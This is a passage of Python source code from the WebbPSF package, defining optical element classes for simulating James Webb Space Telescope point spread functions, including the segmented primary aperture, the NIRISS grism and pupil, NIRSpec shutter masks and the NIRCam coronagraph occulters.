        # Fringe Zernike coefficients, from Telfer's table
        z5 = field_point_row[defocus_name + "_Z5"].data[0]
        z6 = field_point_row[defocus_name + "_Z6"].data[0]
        # Have to convert Zernike normalization and order from Fringe to Noll,
        # and nanometers to meters
        astig0 = z6 / np.sqrt(6) * 1e-9
        astig45 = z5 / np.sqrt(6) * 1e-9
        if self.verbose:
            print(power)

        return power, astig0, astig45
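
# Illustrative usage sketch for the weak lens model above. This helper is added
# for documentation purposes only: it is not called anywhere in this module, and
# the instrument setup shown is an assumption (it requires a working WebbPSF
# data installation). It simply exercises the nearest-field-point lookup and
# reports the resulting defocus power.
def _example_weak_lens_usage():  # pragma: no cover
    """Sketch: build a field-dependent WLP8 model and report its power."""
    import webbpsf
    nrc = webbpsf.NIRCam()
    nrc.detector_position = (1024, 1024)  # hypothetical field position, in pixels
    lens = NIRCamFieldDependentWeakLens('WLP8', instrument=nrc, verbose=True)
    print(f"WLP8 P-V defocus: {lens.power_pv_waves:.3f} waves at 2.12 microns")
    return lens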
import os

import poppy
import poppy.utils
import numpy as np
import matplotlib
import matplotlib.pyplot as plt

from astropy.table import Table
import astropy.io.fits as fits
import astropy.units as units
from scipy.interpolate import griddata, RegularGridInterpolator
from scipy.ndimage import rotate

from . import utils
from . import constants

import logging

_log = logging.getLogger('webbpsf')

import pysiaf

####### Classes for modeling aspects of JWST's segmented active primary #####


def segment_zernike_basis(segnum=1, nterms=15, npix=512, outside=np.nan):
    """ Basis set in the style of poppy.zernike.zernike_basis for segment-level
    Zernike polynomials for one segment at a time in JWST's aperture.

    Parameters
    ----------
    segnum : integer
        1 to 18, number of JWST segment. Uses same numbering convention as the WSS.
    nterms : integer
        Number of Zernike polynomial terms to return
    npix : integer
        Number of pixels per side of the array
    outside : float
        Value to fill the array with outside of the valid segment.
    """
    from .webbpsf_core import segname
    aper = WebbPrimaryAperture(label_segments=True)
    w = poppy.Wavefront(
        npix=npix,
        diam=constants.JWST_CIRCUMSCRIBED_DIAMETER
    )
    segmask = aper.get_transmission(w)

    # use a distinct local name, to avoid shadowing the imported segname() function
    seg_name = segname(segnum)
    cenx, ceny = aper.seg_centers[seg_name]

    # nominal point to point diam for A and B segments;
    # ignoring slight departures from ideal hexes for now.
    seg_radius = constants.JWST_SEGMENT_RADIUS

    y, x = w.coordinates()

    r = np.sqrt((y - ceny) ** 2 + (x - cenx) ** 2) / seg_radius
    theta = np.arctan2((y - ceny) / seg_radius, (x - cenx) / seg_radius)

    r[segmask != segnum] = np.nan
    theta[segmask != segnum] = np.nan

    wg = np.where(segmask == segnum)
    outzerns = np.full((nterms, npix, npix), outside, dtype=float)
    outzerns_tmp = poppy.zernike.zernike_basis(
        nterms=nterms,
        rho=r[wg],
        theta=theta[wg],
        outside=outside
    )
    for iz in range(nterms):
        outzerns[iz][wg] = outzerns_tmp[iz]

    return outzerns


class WebbPrimaryAperture(poppy.AnalyticOpticalElement):
    """ The JWST telescope primary mirror geometry, in all its
    hexagonal obscured complexity. Note this has **just the aperture shape**
    and not any wavefront error terms.

    JWST design pupil geometry and segment coordinates taken
    from Paul Lightsey's spreadsheet: "2010.03.16 Transmission X Area Budget.xls".
    That document was in turn based on Ball Aerospace drawing 2220169 Rev B,
    and the OTE Cryogenic Optics ICD, BATC doc # C327693.

    This class has no wavefront errors; it's just the pupil geometry, including
    the segments (which are not quite perfect hexagons, for manufacturing reasons
    related to trying to tile a curved surface with hexagons while maintaining
    uniform clearance between adjacent segments) and the secondary mirror support
    struts, including the bumps on the +V3 strut for the mid boom hinge and mag
    dampers.

    .. warning:: At high sampling factors, PSF calculations become a LOT slower.

    By default, this produces an aperture with values 0 and 1 for the transmission.
    By setting the parameter label_segments=True, you can instead have it generate
    a map of which segment number is in which location.
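
    Examples
    --------
    A short sketch of sampling this aperture onto a wavefront, following the
    same pattern used by ``segment_zernike_basis`` above (illustrative only):

    >>> aper = WebbPrimaryAperture(label_segments=True)  # doctest: +SKIP
    >>> w = poppy.Wavefront(npix=512, diam=constants.JWST_CIRCUMSCRIBED_DIAMETER)  # doctest: +SKIP
    >>> segmap = aper.get_transmission(w)  # segment numbers; 0 elsewhere  # doctest: +SKIP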
""" def __init__(self, name="WebbPrimaryAperture", label_segments=False, **kwargs): super(WebbPrimaryAperture, self).__init__(name=name, **kwargs) self.label_segments = label_segments self.segdata = constants.JWST_PRIMARY_SEGMENTS self.strutdata = constants.JWST_PRIMARY_STRUTS self.seg_centers = dict(constants.JWST_PRIMARY_SEGMENT_CENTERS) def get_transmission(self, wave): segpaths = {} strutpaths = [] for segname, vertices in self.segdata: segpaths[segname] = matplotlib.path.Path(vertices) for strutname, vertices in self.strutdata: strutpaths.append(matplotlib.path.Path(vertices)) y, x = wave.coordinates() pts = np.asarray([a for a in zip(x.flat, y.flat)]) npix = wave.shape[0] out = np.zeros((npix, npix)) # paint the segments 1 but leave out the SMSS struts for segname, p in segpaths.items(): res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 1 if not self.label_segments else int(segname.split('-')[1]) for p in strutpaths: res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 0 return out # Note - the following is **NOT USED YET ** # This will be finished up and used in a subsequent release to # apply the OTE field dependence. For now just the fixed per SI stuff # is there. class WebbOTEPupil(poppy.FITSOpticalElement): """The complex OTE pupil, including: 1) the aperture geometry, based on the cryo ICD detailed coordinates 2) high spatial frequency WFE from the as-built mirrors in Rev G optical model 3) mid frequencies from Rev W optical budget 4) low frequency field-dependent WFE from the Rev G optical model. Parameters ----------- level : ' """ def __init__(self, instrument=None, level='requirements', opd_index=0, **kwargs): if instrument is not None: self.instrument = instrument self.instr_name = instrument.name self.tel_coords = instrument._tel_coords() else: self.instrument = None self.instr_name = "NIRCam" # TODO figure out default V2V3 coords here self.tel_coords = (0, 0) # ? TODO # determine filename for pupil amplitude array aperture_file = 'jwst_pupil_revW_npix1024.fits.gz' aperture_file = os.path.abspath(os.path.join( utils.get_webbpsf_data_path(), aperture_file )) # determine filename for the OPD array # This should contain a precomputed combination of # Rev G high spatial frequencies and # Rev W mid spatial frequencies # Depends on what the 'level' parameter is. if level == 'perfect': opd_file = os.path.join( utils.get_webbpsf_data_path(), 'OPD_jwst_ote_perfectly_aligned.fits' ) elif level in ('predicted', 'requirements'): opd_file = os.path.join( utils.get_webbpsf_data_path(), self.instr_name, 'OPD', 'OPD_RevW_ote_for_{}_{}.fits'.format(self.instr_name, level) ) else: raise ValueError("Invalid/unknown wavefront error level") super(WebbOTEPupil, self).__init__(name='JWST Primary', transmission=aperture_file, opd=opd_file, **kwargs) if self.instrument is not None: # we need a field point to be able to use this so # just skip it if we don't have one. # determine Zernike coeffs for field dependent error # based on Rev G field dependence model. coeffs = np.zeros(22) self.zernike_coeffs = coeffs # TODO apply that to as a modification to the OPD array. ####### Custom Optics used in JWInstrument classes ##### class NIRSpec_three_MSA_shutters(poppy.AnalyticOpticalElement): """ Three NIRSpec MSA shutters, adjacent vertically.""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. 
        The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26 x 0.51.
        The walls separating adjacent shutters are 0.06 arcsec wide.
        """

        msa_width = 0.2
        msa_height = 0.45
        msa_wall = 0.06

        if not isinstance(wave, poppy.Wavefront):
            raise ValueError("get_transmission must be called with a Wavefront to define the spacing")
        assert (wave.planetype == poppy.poppy_core._IMAGE)

        y, x = wave.coordinates()

        self.transmission = np.zeros(wave.shape)
        # get the innermost shutter that spans the Y axis
        w_inside_1 = np.where((abs(y) < (msa_height / 2)) & (abs(x) < (msa_width / 2)))
        self.transmission[w_inside_1] = 1
        # get the adjacent shutters one above and one below.
        w_inside_2 = np.where((abs(y) > (msa_height / 2) + msa_wall)
                              & (abs(y) < msa_height * 1.5 + msa_wall)
                              & (abs(x) < (msa_width / 2)))
        self.transmission[w_inside_2] = 1

        return self.transmission


class NIRSpec_MSA_open_grid(poppy.AnalyticOpticalElement):
    """ An infinite repeating region of the NIRSpec MSA grid"""

    def get_transmission(self, wave):
        """ Compute the transmission inside/outside of the field stop.

        The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26 x 0.51.
        The walls separating adjacent shutters are 0.06 arcsec wide.
        """

        msa_wall = 0.06
        msa_x_pitch = 0.26
        msa_y_pitch = 0.51

        if not isinstance(wave, poppy.Wavefront):
            raise ValueError("get_transmission must be called with a Wavefront to define the spacing")
        assert (wave.planetype == poppy.poppy_core._IMAGE)

        y, x = wave.coordinates()

        # xnew = x * np.cos(np.deg2rad(self.angle)) + y * np.sin(np.deg2rad(self.angle))
        # ynew = -x * np.sin(np.deg2rad(self.angle)) + y * np.cos(np.deg2rad(self.angle))
        # x, y = xnew, ynew

        mask_vert_walls = np.abs(np.mod(np.abs(x), msa_x_pitch) - (msa_x_pitch / 2)) < msa_wall / 2
        mask_horz_walls = np.abs(np.mod(np.abs(y), msa_y_pitch) - (msa_y_pitch / 2)) < msa_wall / 2

        self.transmission = np.ones(wave.shape)
        self.transmission[mask_vert_walls] = 0
        self.transmission[mask_horz_walls] = 0

        return self.transmission


class NIRISS_GR700XD_Grism(poppy.AnalyticOpticalElement):
    """ Custom optic class to model the NIRISS SOSS grism GR700XD

    This includes both the pupil mask file and the cylindrical lens

    Based on inputs from Loic Albert, Anand Sivaramakrishnan, and Andre Martel
    In particular see FGS_TFI_UdM_035_RevD for details of the NIRISS GR700XD
    measurement, and JWST-STScI-003338 for detector orientation and layout.

    GRISM DESIGN:

    The grism (and cylinder) are per design rotated by 2 degrees so as to be able
    to sample an emission line across different pixel positions along the spatial
    direction (kind of resampling the line, rather than being limited by
    intra-pixel response).

    From Loic Albert's NIRISS technical report:

        * surface sag for the cylinder: 3.994 micron peak
        * limited to 3.968 microns for the 26 mm FOV mask

    From Loic Albert's email to Marshall 2013-07-18:

            I do have an update concerning the geometry of the GR700XD pupil
            mask. It turns out that they clocked the grism by about 2.25 degrees
            wrt the OTE system of coordinates. However, the field mask did not
            follow and is still aligned along the OTE s.o.c. That was a mistake
            that fortunately does not have much impact.

            Comdev is in the process of modelling a new mask for the Spare
            grism. Remember that we will swap the current Flight GR700XD for its
            Spare, which offers much improved performance. The mask size will be
            a little different (rectangular) and this time will be clocked 2.25
            degrees along with the grism.
            The sign of the rotation of the grism will have to be devised by
            trying the 2 possibilities and looking at the resulting tilt of the
            monochromatic PSF and the position of that PSF on the detector.
            Attached is a simulation of what we expect based on my own PSF
            generator.

            The cylinder lens has a well characterized power (actually radius of
            curvature). The values are:
                current Flight: 22.85 meters
                Spare: 22.39 meters

            Prism physical size: pupil is 26 mm on a side for the current
            prism, will be 28 mm for the spare

    From Loic Albert's email to Marshall 2013-09-19:

        The latest news on this front are:

        1 - The current Flight mask is attached. It is 26x26 mm. The mask and
            grism are *not* aligned along the same coordinates. That was a
            mistake. I'll forward you a message from Michael M., our optics
            expert at CSA.

        2 - The Spare mask (likely the one which will fly) is not built yet. The
            mask will be aligned along the grism coordinate and both will be
            clocked 2.2 deg wrt the OTE.

        3 - A ghost analysis showed that the current grism clocking will suffer
            from large ghosts. So we are studying how to clock the Spare grism
            in its cell to minimize ghosts. Likely a 90 degrees rotation will be
            applied to baseline of point 2.

    From Michael.Maszkiewicz@asc-csa.gc.ca:

        As far as I understand now, we have two rotations in the as-built
        GR700. One rotation is for the prism-grism combo by 2 deg CCW, looking
        along the local +z axis, and the second rotation is for the mask by
        3.05 deg but CW. As a result there is total 5.05 deg rotation between
        grism and its mask. See my annotations to your drawing attached.

    From Loic Albert's email to Marshall 2014-05-20:

        I should have pointed out that the power assumed in my simulations for
        the cylindrical lens was off. It was one of the conclusions of CV1RR.
        The actual radius of curvature of the cylinder is 25.3 meters (rather
        than the smaller figure I used before).

    ORIENTATION:

        See Figure 2 of JWST-STScI-003338.
        In "DMS" coordinates, as projected looking outwards onto the sky, the
        GR700XD grating trace is near the extreme right edge of the detector,
        with long wavelengths closest to (2048,2048) and short wavelengths
        nearest (2048,0).
        (The raw detector coordinates are very different from this due to a 180
        degree rotation.)

        **PLEASE NOTE** that the DMS when processing spectral data performs an
        additional transformation:
            For spectral data, the science X-axis is aligned with the detector
            dispersion direction and the science frame Y-axis is at a right
            angle to the X-axis in a right-handed coordinate system (Swade 2003)

        We choose here to ignore that complication; WebbPSF simulates the 2D
        sky-projected image in "Sci" coordinates, in the terminology for SIAF
        from Lallo et al. In this coordinate system, the dispersion from the
        cylinder lens is aligned almost along V2 and the longer wavelengths are
        oriented toward +V3.

    Parameters
    ----------
    which : string
        'initial' or 'spare'. Properties are hard coded.
    """
    #
    #    transmission : string filename
    #        file for the pupil transmission function
    #    cylinder_sag_mm : float
    #        physical thickness of the cylindrical lens, in millimeters
    #    rotation_angle : float
    #        degrees clockwise for the orientation of the cylinder's dispersing axis. Default
    #        of 92.25 should be consistent with initial NIRISS grism and spare, except for
    #        sign ambiguity.
    #    rotate_mask : bool
    #        should the field mask be rotated along with the cylinder? False for first gen initial
    #        prism, true for expected spare replacement.
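
    # Example usage (illustrative sketch only, added as commentary; this optic
    # is normally assembled by the NIRISS instrument class rather than
    # constructed directly, and the wavelength below is just a sample value):
    #
    #     grism = NIRISS_GR700XD_Grism(which='Bach')
    #     opd = grism.get_opd(poppy.Wavefront(wavelength=1e-6))
    #     trans = grism.get_transmission(poppy.Wavefront(wavelength=1e-6))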
    def __init__(self, name='GR700XD', which='Bach',
                 # cylinder_radius=22.85, cylinder_sag_mm=4.0, rotation_angle=92.25,
                 # rotate_mask=False, transmission=None,
                 **kwargs):
        # Initialize the base optical element with the pupil transmission and zero OPD

        if which == 'LLNL':
            raise NotImplementedError("Rotated field mask for LLNL grism not yet implemented!")
        elif which == 'Bach':
            # (currently this file path is looked up but not used further below)
            transmission = os.path.join(utils.get_webbpsf_data_path(), "NIRISS/optics/MASKGR700XD.fits.gz")
        else:
            raise NotImplementedError("Unknown grating name:" + which)

        poppy.AnalyticOpticalElement.__init__(self, name=name, planetype=poppy.poppy_core._PUPIL, **kwargs)

        # UPDATED NUMBERS 2013-07:
        # See Document FGS_TFI_UdM_035_RevD

        _log.debug("Computing properties for {0} grism".format(which))
        if which == 'Bach':
            # ---- Phase properties ---------------
            # 3.994 microns P-V over 27.02 mm measured (Loic's email)
            # This is **surface sag**, corresponding to P-V of 6.311 waves at lambda=632.8 nm.
            # should correspond to 3.698 microns over 26 mm clear aperture.
            self.prism_size = 0.02702  # 27.02 millimeters for the physical prism
            self.prism_clear_aperture = 0.0260  # 26 mm clear aperture for the prism + mount
            self.cylinder_rotation_angle = 2  # was 2.25

            # self.cylinder_radius = 22.85  # radius of curvature; Nominal
            # but they discarded that and used 25.3 instead
            # From Lafreniere's wfe_cylindricallens.pro:
            #   "OVERRIDE PREVIOUS CASES AFTER CV1RR RESULTS:"
            self.cylinder_radius = 25.3  # radius of curvature

            # ---- Amplitude Transmission / Pupil shape ---------------
            self.pupil_size_mm = 26.0
            # Note that the IDL code says 26 mm is 683.75 pixels using the assumed demagnification
            self.pupil_rotation_angle = 2.0

        else:
            # 5.8 microns P-V over 32.15 mm (Loic's email)
            # should correspond to 4.38 microns over 28 mm clear aperture
            self.cylinder_radius = 22.39  # radius of curvature
            self.prism_size = 0.03215  # millimeters for the physical prism
            self.prism_clear_aperture = 0.0280  # clear aperture for the prism + mount
            self.cylinder_rotation_angle = 2.25

        # We need to know the magnification scale of the NIRISS reimaged pupil
        # in order to compute the curvature in the full-pupil units that POPPY uses
        # internally

        # pupil magnification computed from 22 mm clear aperture reported =
        # 857-169 pixels = 699 pixels in the 2D array which has scale = .00645604
        # = 4.44175 meters projected on the primary

        # 2014-05-21 but wait, that's actually 26 mm!
        # so the 699 pixels at 0.00645604 m/pixel = 4.512 meters implies the magnification is 173 not 170
        # but, double wait, it's actually more like 687 pixels across rather than 699 so that makes it 170 again.

        # therefore the magnification is 0.1708 meters projected on the primary / mm in the NIRISS pupil
        # self.pupil_demagnification = 170.8367  # meters on the primary / meters in the NIRISS pupil
        # self.pupil_demagnification = 173.56  # meters on the primary / meters in the NIRISS pupil

        # Anand says:
        #   nominally the circumscribing circle at the PW of NIRISS is ~40mm.
        #   I use 39mm for the nrm, but it's slightly field-dependent.
        #   Compare that to the 6.6... PM circle?
        self.pupil_demagnification = 6.6 / 0.040  # about 165

        # perform an initial population of the OPD array for display etc.
        tmp = self.get_phasor(poppy.Wavefront(2e-6))

    def get_opd(self, wave):
        """ Make an OPD array corresponding to the cylindrical weak lens
        used for defocusing the spectrum in the perpendicular-to-dispersion direction.
        Parameters
        ----------
        wave : float or obj
            either a scalar wavelength (meters) or a Wavefront object
        """
        # wave should be a Wavefront object
        # wavelength is an astropy.units type
        if isinstance(wave, poppy.Wavefront):
            wavelength = wave.wavelength
        else:
            wave = poppy.Wavefront(wavelength=float(wave))
            wavelength = wave.wavelength

        # compute indices in pixels, relative to center of plane, with rotation
        # units of these are meters
        y, x = wave.coordinates()

        ang = np.deg2rad(self.cylinder_rotation_angle)
        # rotate via temporaries, so that the second expression sees the
        # *original* x (overwriting x in place first would corrupt the rotation)
        x_rot = np.cos(ang) * x - np.sin(ang) * y
        y_rot = np.sin(ang) * x + np.cos(ang) * y
        x, y = x_rot, y_rot

        _log.debug(" Rotating local grism axes by {0} degrees".format(self.cylinder_rotation_angle))

        # From IDL code by David Lafreniere:
        # ;the cylindrical defocus
        # x=(dindgen(pupdim)-pupdim/2)#replicate(1,pupdim)
        # y0=(rpuppix^2+sag[s]^2)/(2*sag[s])
        # wfe1=y0-sqrt(y0^2-x^2)
        # if sag[s] lt 1.e-5 then wfe1=0.d0

        # Here I will just translate that to Python exactly, making use of the
        # variables here:

        # rpuppix = radius of pupil in pixels
        # rpuppix = self.amplitude_header['DIAM'] / self.amplitude_header['PUPLSCAL'] / 2

        # Calculate the radius of curvature of the cylinder, based on
        # the chord length and height

        # In this case we're assuming the cylinder is precisely as wide as the projected
        # telescope pupil. This doesn't seem guaranteed:
        #  * actual chord length across cylinder: 27.02 mm.
        #  * projected primary scale at NIRISS = ?

        _log.debug(" Computing GR700XD cylinder based on RoC: {0:.3g} meters".format(self.cylinder_radius))
        _log.debug(" Computing GR700XD cylinder based on pupil demagnification: {0:.3g} primary to grism".format(
            self.pupil_demagnification))

        # Compute the overall sag of the cylinder lens at its outer edge. This is not actually used,
        # it's just for cross-check of the values.
        # The sag will depend on half the pupil size since that's the offset from center to edge.
        sag0 = np.sqrt(self.cylinder_radius ** 2 - (self.prism_size / 2) ** 2) - self.cylinder_radius
        _log.debug(" Computed GR700XD cylinder sag at lens outer edge (for cross check only): {0:.3g} meters".format(sag0))

        # now compute the spatially dependent sag of the cylinder, as projected onto the primary

        # what is the pupil scale at the *reimaged pupil* of the grism?
        pupil_scale_m_per_pix = 38.0255e-6  # Based on UdeM info in wfe_cylindricallens.pro
        # sag = np.sqrt(self.cylinder_radius**2 - (x*self.amplitude_header['PUPLSCAL']/self.pupil_demagnification)**2) - self.cylinder_radius
        sag = np.sqrt(self.cylinder_radius ** 2 - (x / self.pupil_demagnification) ** 2) - self.cylinder_radius
        # sag = self.cylinder_radius - np.sqrt(self.cylinder_radius**2 - (x * pupil_scale_m_per_pix )**2 )

        # what we really want to do is take the physical properties of the as-built optic, and interpolate into that
        # to compute the OPD after remapping based on the pupil scale (and distortion?)
        # y0=(rpuppix**2+self.cylinder_sag**2)/(2*self.cylinder_sag)
        # wfe1=y0-np.sqrt(y0**2-x**2)

        _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across full array".format(sag.max() - sag.min()))

        # no OPD in opaque regions (makes no difference in propagation but improves display)
        if self._transmission.shape != sag.shape:
            self.get_transmission(wave)  # Update the ._transmission attribute
        sag[self._transmission == 0] = 0
        wnz = np.where(self._transmission != 0)  # use this just for display of the log messages:
        _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across clear aperture".format(
            sag[wnz].max() - sag[wnz].min()))

        # scale for index of refraction
        index = self.ZnS_index(wavelength)
        opd = sag * (index - 1)
        lambda_micron = wavelength.to(units.micron).value
        _log.debug(" Scaling for ZnS index of refraction {0} at {1:.3g} microns".format(index, lambda_micron))
        _log.debug(" Cylinder P-V: {0:.4g} meters optical sag at {1:.3g} microns across clear aperture".format(
            opd[wnz].max() - opd[wnz].min(), lambda_micron))
        return opd

    def get_transmission(self, wave):
        """ Make array for the pupil obscuration appropriate to the grism
        """
        if isinstance(wave, poppy.Wavefront):
            wavelength = wave.wavelength
        else:
            wave = poppy.Wavefront(wavelength=float(wave))
            wavelength = wave.wavelength

        y, x = wave.coordinates()
        ang = np.deg2rad(self.pupil_rotation_angle)
        # rotate via temporaries, so both expressions use the original coordinates
        x_rot = np.cos(ang) * x - np.sin(ang) * y
        y_rot = np.sin(ang) * x + np.cos(ang) * y
        x, y = x_rot, y_rot

        _log.debug("Rotating local pupil mask axes by {0} degrees".format(self.pupil_rotation_angle))

        pupil_halfsize_m = self.pupil_size_mm / 2 / 1000 * self.pupil_demagnification
        pupilmask = np.ones_like(x)
        pupilmask[np.abs(x) > pupil_halfsize_m] = 0
        pupilmask[np.abs(y) > pupil_halfsize_m] = 0

        self._transmission = pupilmask

        return pupilmask

    @poppy.utils.quantity_input(wavelength=units.meter)
    def ZnS_index(self, wavelength, temperature=40):
        """ Return cryogenic index of refraction of ZnS (Cleartran)

        Based on IDL function index_cleartran provided by Loic Albert at U de Montreal,
        which was in turn based on Leviton and Fray 2013
        http://proceedings.spiedigitallibrary.org/proceeding.aspx?articleid=1744938
        doi:10.1117/12.2024817
        """
        lambda_micron = wavelength.to(units.micron).value

        # Sellmeier dispersion model
        # From Leviton & Frey measurements (SPIE preprint) (assumes lambda in microns)
        S_1 = np.asarray([[3.35933, -5.12262e-4, 1.01086e-5, -4.14798e-8, 6.91051e-11]])
        S_2 = np.asarray([[0.706131, 4.89603e-4, -8.91159e-6, 3.81621e-8, -6.54805e-11]])
        S_3 = np.asarray([[4.02154, -2.93193e-2, 2.31080e-4, -7.57289e-07, 8.31188e-10]])
        S_ij = np.concatenate((S_1, S_2, S_3), axis=0)

        lambda_1 = np.array([[0.161151, -8.93057E-06, 2.73286E-07, -1.23408E-09, 2.29917E-12]])
        lambda_2 = np.array([[0.282427, -4.66636E-05, 7.55906E-07, -2.77513E-09, 4.35237E-12]])
        lambda_3 = np.array([[41.1590, -0.161010, 1.23906E-03, -3.95895E-06, 4.16370E-09]])
        lambda_ij = np.concatenate((lambda_1, lambda_2, lambda_3))

        n2minus1 = 0.0
        T = temperature
        for i in range(3):
            S_i = S_ij[i, 0] + S_ij[i, 1] * T + S_ij[i, 2] * T ** 2.0 + S_ij[i, 3] * T ** 3.0 + S_ij[i, 4] * T ** 4.0
            lambda_i = (lambda_ij[i, 0] + lambda_ij[i, 1] * T + lambda_ij[i, 2] * T ** 2.0
                        + lambda_ij[i, 3] * T ** 3.0 + lambda_ij[i, 4] * T ** 4.0)
            n2minus1 += S_i * lambda_micron ** 2.0 / (lambda_micron ** 2.0 - lambda_i ** 2.0)

        cleartran_index = np.sqrt(1.0 + n2minus1)
        return cleartran_index

    def display(self, opd_vmax=6e-6, *args, **kwargs):
        "Same as regular display for any other optical element, except opd_vmax default changed"
        poppy.AnalyticOpticalElement.display(self, *args, opd_vmax=opd_vmax, **kwargs)


class NIRISS_CLEARP(poppy.CompoundAnalyticOptic):
    """NIRISS 'CLEARP' pupil, including PAR obscuration

    **CAUTIONARY NOTE** TODO: This class represents this optic as having a circular outer edge;
    in reality the hardware has a 4% oversized tricontagon mask around the JWST pupil image.
    However, as the primary mirror should serve as the pupil stop, in practice this model
    simplification should not affect output PSFs in imaging modes. This simplification may be
    removed in a future version of WebbPSF. See https://github.com/mperrin/webbpsf/issues/71

    CLEARP pupil info from:
       MODIFIED CALIBRATION OPTIC HOLDER - NIRISS
       DRAWING NO 196847  REV 0  COMDEV
       Design file name 196847Rev0.pdf sent by Loic Albert

    Properties:
     39 mm outer diam, corresponds to the circumscribing pupil of JWST
     2.0 mm vane width
     6.0 mm radius for central obstruction

    Note the circumscribing pupil of JWST is 6603.464 mm in diameter
    (Ball SER on geometric optics model: BALL-JWST-SYST-05-003)
    and therefore the NIRISS pupil magnification is 6.603464/39.0 = 0.1693 meters
    (JWST primary) per mm (NIRISS internal pupil)

    Pupil distortions are not included in this model.
    """

    def __init__(self, *args, **kwargs):
        # The pupil geometry values used here are documented in the class docstring above.
        pupil_mag = 6.603464 / 39.0
        poppy.CompoundAnalyticOptic.__init__(self, (
            poppy.SecondaryObscuration(secondary_radius=6.0 * pupil_mag,
                                       support_width=2.0 * pupil_mag,
                                       n_supports=3,
                                       support_angle_offset=90 + 180,  # align first support with +V2 axis
                                                                       # but invert to match OTE exit pupil
                                       *args, **kwargs),
            poppy.CircularAperture(radius=39 * pupil_mag / 2, *args, **kwargs)),
            name='CLEARP')


class NIRCam_BandLimitedCoron(poppy.BandLimitedCoron):
    """ Band Limited Coronagraph

    Parameters
    ----------
    name : string
        Descriptive name. Must be one of the defined NIRCam coronagraphic mask names.
    module : string
        A or B
    nd_squares : bool
        Include the ND squares in the mask simulation? (Not an option in the real instrument;
        solely for certain simulation checks.)
    bar_offset : float
        Offset along coronagraphic bar (wedge) occulter, in arcseconds.
        Used for computing a PSF at a different position along the wedge, while
        keeping the convention that the target star has zero tip/tilt.
        This option is used to MANUALLY specify a specific position along the bar;
        see also the following option auto_offset.
    auto_offset : string or None
        Set to a NIRCam filter name to automatically offset to the nominal
        position along the bar for that filter. See bar_offset if you want to set
        to some arbitrary position.
    shift_x, shift_y : floats or None
        X and Y offset shifts applied to the occulter, via the standard mechanism for
        poppy.AnalyticOpticalElements. Like bar_offset, but allows for 2D offsets, and
        applies to both bar and wedge coronagraphs. This is IN ADDITION TO any offset
        from bar_offset.
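
    Examples
    --------
    Illustrative sketch only (the arguments are taken from this class's own
    signature; the filter choice is just an example):

    >>> blc = NIRCam_BandLimitedCoron(name='MASKLWB', module='A',
    ...                               auto_offset='F460M')  # doctest: +SKIP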
""" allowable_kinds = ['nircamcircular', 'nircamwedge'] """ Allowable types of BLC supported by this class""" def __init__(self, name="unnamed BLC", kind='nircamcircular', module='A', nd_squares=True, bar_offset=None, auto_offset=None, **kwargs): super(NIRCam_BandLimitedCoron, self).__init__(name=name, kind=kind, **kwargs) if module not in ['A', 'B']: raise ValueError("module parameter must be 'A' or 'B'.") self.module = module self.nd_squares = nd_squares if self.name == 'MASK210R': self.sigma = 5.253 self.kind = 'nircamcircular' elif self.name == 'MASK335R': self.sigma = 3.2927866 self.kind = 'nircamcircular' elif self.name == 'MASK430R': self.sigma = 2.58832 self.kind = 'nircamcircular' elif self.name == 'MASKSWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor elif self.name == 'MASKLWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor else: raise NotImplementedError("invalid name for NIRCam occulter: " + self.name) # EDIT: updated on 8 Dec 2021 to grab offsets directly from pySIAF self.siaf = pysiaf.Siaf('NIRCAM') self.offset_swb = {filt: self.get_bar_offset_from_siaf(filt, channel='SW') for filt in ["F182M", "F187N", "F210M", "F212N", "F200W", 'narrow']} self.offset_lwb = {filt: self.get_bar_offset_from_siaf(filt, channel='LW') for filt in ["F250M", "F300M", "F277W", "F335M", "F360M", "F356W", "F410M", "F430M", "F460M", "F480M", "F444W", 'narrow']} if bar_offset is None and auto_offset is not None: offsets = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb try: bar_offset = offsets[auto_offset] _log.debug("Set bar offset to {} based on requested filter {} on {}.".format(bar_offset, auto_offset, self.name)) except: raise ValueError("Filter {} does not have a defined nominal offset position along {}".format(auto_offset, self.name)) if bar_offset is not None: if self.kind == 'nircamcircular': raise ValueError("bar_offset option only makes sense with the bar occulters.") self.bar_offset = float(bar_offset) _log.debug("Set offset along {} to {} arcsec.".format(self.name, self.bar_offset)) else: self.bar_offset = None def get_bar_offset_from_siaf(self, filt, channel='LW'): """ Get bar offset directly from SIAF. """ if channel == 'SW': refapername = 'NRCA4_MASKSWB' apername = 'NRCA4_MASKSWB_' + filt.upper() else: # otherwise default to LW refapername = 'NRCA5_MASKLWB' apername = 'NRCA5_MASKLWB_' + filt.upper() offset_arcsec = np.sqrt((self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref)**2 + (self.siaf.apertures[refapername].V3Ref - self.siaf.apertures[apername].V3Ref)**2) sign = np.sign(self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref) return sign * offset_arcsec def get_transmission(self, wave): """ Compute the amplitude transmission appropriate for a BLC for some given pixel spacing corresponding to the supplied Wavefront. Based on the Krist et al. SPIE paper on NIRCam coronagraph design Note that the equations in Krist et al specify the intensity transmission of the occulter, but what we want to return here is the amplitude transmittance. That is the square root of the intensity, of course, so the equations as implemented here all differ from those written in Krist's SPIE paper by lacking an exponential factor of 2. Thanks to John Krist for pointing this out. 
